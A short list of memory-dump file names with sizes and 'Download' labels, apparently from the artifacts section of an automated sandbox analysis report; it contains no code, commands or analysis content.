memory/1956-88-0x0000000000000000-mapping.dmp

Download
memory/1964-130-0x0000000000000000-mapping.dmp

Download
memory/1972-94-0x0000000001230000-0x0000000001EF4000-memory.dmp

Filesize
12.8MB

Download
memory/1972-141-0x0000000001230000-0x0000000001EF4000-memory.dmp

Filesize
12.8MB

Download
memory/1988-119-0x0000000000000000-mapping.dmp

Download
memory/2016-80-0x0000000000000000-mapping.dmp

Download